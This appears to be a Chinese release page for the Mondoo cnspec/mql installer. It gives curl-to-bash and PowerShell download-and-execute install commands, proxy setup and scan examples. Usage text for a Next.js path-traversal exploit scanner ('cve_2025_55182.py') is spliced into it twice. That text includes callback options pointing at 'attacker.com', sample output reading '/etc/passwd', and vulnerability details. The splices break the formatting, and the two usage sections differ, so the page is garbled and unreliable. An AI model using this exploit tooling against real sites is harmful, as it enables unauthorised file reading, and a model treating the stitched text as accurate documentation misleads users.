返回更新列表
新发布Jul 21, 2026

installer v13.30.0

适用于 cnquery 和 cnspec 的 Linux、macOS 和 Windows 安装脚本

分享

概述

状态

  • Docker 容器: Release Test: Docker Containers
  • Homebrew: Release Test: Homebrew
  • Install.sh: Release Test: install.sh
  • Install.ps1: Release Test: install.ps1
  • macOS Pkg: Release Test: macOS Package
  • Arch Linux: Release Test: Arch Linux

安装

安装 mql 和 cnspec 最简单的方法是使用安装脚本。

通过 Shell 脚本(Linux 和 macOS)

https://install.mondoo.com/sh```bash bash -c "$(curl -sSL https://install.mondoo.com/sh)"

### 通过 PowerShell (Windows)

[`https://install.mondoo.com/ps1`](https://install.mondoo.com/ps1)```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo;

在 HTTP 代理之后

使用 -x(Linux 和 macOS)或 -Proxy(Windows)将代理传递给安装脚本。该脚本会将其自身的下载、软件包安装、cnspec login 以及自动更新程序都通过该代理进行路由。脚本的初始下载发生在读取该标志之前,因此也请将初始下载指向该代理:```bash export https_proxy='http://proxy.example.com:3128' curl -sSL --proxy "$https_proxy" https://install.mondoo.com/sh | bash -s -- -x "$https_proxy"

## 使用示例

### 基本用法

```bash
# 扫描单个目标
python3 cve_2025_55182.py -t https://target.example.com

# 使用代理扫描
python3 cve_2025_55182.py -t https://target.example.com -p http://127.0.0.1:8080

# 从文件扫描多个目标
python3 cve_2025_55182.py -f targets.txt

# 使用自定义超时和线程数
python3 cve_2025_55182.py -f targets.txt -T 15 -t 20

高级用法

# 使用自定义回调域名进行带外检测
python3 cve_2025_55182.py -t https://target.example.com -c your-collab-domain.oastify.com

# 详细输出并保存结果
python3 cve_2025_55182.py -f targets.txt -v -o results.json

# 使用自定义 User-Agent 和请求头
python3 cve_2025_55182.py -t https://target.example.com -A "Mozilla/5.0 (Custom)" -H "X-Forwarded-For: 127.0.0.1"

命令行选项

选项描述默认值
-t, --target单个目标 URL-
-f, --file包含目标 URL 的文件-
-p, --proxy用于请求的代理 URL-
-c, --callback用于带外检测的回调域名-
-T, --timeout请求超时时间(秒)10
-t, --threads并发线程数10
-A, --user-agent自定义 User-Agent 字符串随机
-H, --header自定义请求头(可多次使用)-
-o, --output输出文件(JSON 格式)-
-v, --verbose启用详细输出False
--no-color禁用彩色输出False

检测方法

该工具采用多种检测技术:

  1. 版本检测:通过响应头、错误页面和静态资源指纹识别 Next.js 版本
  2. 路径遍历测试:尝试使用各种编码技术访问已知的敏感文件
  3. 带外检测:使用唯一标识符监控回调域名以确认利用成功
  4. 响应分析:分析响应状态码、内容长度和响应体模式以识别漏洞

输出格式

控制台输出

[+] 正在扫描: https://target.example.com
[+] 检测到 Next.js 版本: 15.0.3
[!] 目标可能存在漏洞: https://target.example.com
[+] 发现敏感文件: /etc/passwd
[+] 扫描完成。发现 1 个存在漏洞的目标。

JSON 输出

{
  "scan_time": "2025-01-15T10:30:00Z",
  "targets_scanned": 1,
  "vulnerable_targets": [
    {
      "url": "https://target.example.com",
      "nextjs_version": "15.0.3",
      "vulnerable": true,
      "evidence": {
        "type": "path_traversal",
        "file": "/etc/passwd",
        "content_preview": "root:x:0:0:root:/root:/bin/bash"
      }
    }
  ]
}

漏洞详情

CVE-2025-55182

  • 类型:路径遍历 / 任意文件读取
  • 受影响组件:Next.js 中间件
  • 受影响版本:15.0.0 - 15.0.4、14.2.0 - 14.2.25、13.5.0 - 13.5.9
  • CVSS 评分:7.5(高危)
  • 影响:攻击者可通过特制请求读取服务器上的任意文件

技术分析

该漏洞存在于 Next.js 中间件处理 URL 编码路径的方式中。通过发送包含特定编码序列的请求,攻击者可以绕过路径规范化并访问预期 Web 根目录之外的文件。

缓解措施

  1. 升级 Next.js:升级到已修复版本(15.0.5+、14.2.26+、13.5.10+)
  2. 输入验证:验证并清理所有用户提供的路径
  3. Web 应用防火墙:部署 WAF 规则以阻止路径遍历尝试
  4. 最小权限原则:以最小文件系统权限运行 Node.js 进程
  5. 监控:监控日志中可疑的路径遍历模式

免责声明

本工具仅供教育和授权安全测试目的使用。未经授权访问计算机系统是违法的。请务必获得适当授权后再测试任何系统。作者对因使用本工具造成的任何误用或损害不承担责任。```powershell Set-ExecutionPolicy Unrestricted -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; $wc = New-Object System.Net.WebClient; $wc.Proxy = New-Object System.Net.WebProxy('http://proxy.example.com:3128'); iex ($wc.DownloadString('https://install.mondoo.com/ps1')); Install-Mondoo -Proxy 'http://proxy.example.com:3128';

在 Linux 和 macOS 上,当未指定 `-x` 时,会自动采用继承的 `https_proxy` 或 `http_proxy`。无论哪种方式,两种形式都会被导出,因此发行版自身的软件仓库——在 Debian 和 Ubuntu 上是纯 HTTP——也会通过代理访问。你设置的任何 `no_proxy` 都会原样传递,包括跨 `sudo` 时。

代理 URL 必须是纯 URL:如果它携带凭据,请对凭据进行百分号编码(`!` 编码为 `%21`,依此类推)。该值会被写入自动更新程序的计划任务中,因此在那里需要引号的字符会被拒绝,而不是被转义。

## 扫描你的目标平台

扫描你的[目标平台](https://github.com/mondoohq/cnspec/#supported-targets):```bash
# query system information with incident and inventory query pack
mql scan aws
# scan the platform for security vulnerabilities
cnspec scan aws

注册 Mondoo 账户以访问更多策略并存储报告。如需了解更多信息,联系我们。```bash cnspec login -t 'eyJh...llZ4BW'

mql 和 cnspec 支持本地和远程目标,包括服务器(Linux、Windows、macOS)、云(AWS、Azure、Google、VMware)、Kubernetes(EKS、GKE、AKS、自管理)、容器、容器注册表、SaaS 产品(Google Workspace、M365、GitHub、GitLab)等。

运行扫描:```bash
# scan your local host
cnspec scan local

# scan a cloud environment
cnspec scan aws
cnspec scan gcp
cnspec scan azure

# scan a kubernetes cluster
cnspec scan k8s

# scan a docker image from a remote registry
cnspec scan docker image debian:12

# scan a docker container (get ids from docker ps)
cnspec scan docker container 00fa961d6b6a

# scan a system over ssh
cnspec scan ssh [email protected]

包信息

https://install.mondoo.com/package/cnspec/{platform}/{arch}/{filetype}/{version}/{method}

参数支持以下值:

参数值
platformlinux、windows、darwin
archamd64、arm64、armv7、armv6、386、ppc64le
filetypetar.gz、deb、rpm、zip、pkg、msi
versionlatest 或具体版本号
methoddownload、filename、version、sha256

Download the latest version

https://install.mondoo.com/package/cnspec/linux/arm64/rpm/latest/download

## 使用示例

### 基本用法

```bash
# 扫描单个目标
python3 cve_2025_55182.py -t https://target.example.com

# 使用代理扫描
python3 cve_2025_55182.py -t https://target.example.com -p http://127.0.0.1:8080

# 从文件扫描多个目标
python3 cve_2025_55182.py -f targets.txt

# 使用自定义超时时间扫描
python3 cve_2025_55182.py -t https://target.example.com --timeout 15

# 详细输出
python3 cve_2025_55182.py -t https://target.example.com -v

高级用法

# 使用自定义回调地址进行扫描
python3 cve_2025_55182.py -t https://target.example.com --callback http://attacker.com

# 使用自定义载荷进行扫描
python3 cve_2025_55182.py -t https://target.example.com --payload "custom_payload"

# 使用自定义用户代理进行扫描
python3 cve_2025_55182.py -t https://target.example.com --user-agent "Mozilla/5.0"

分类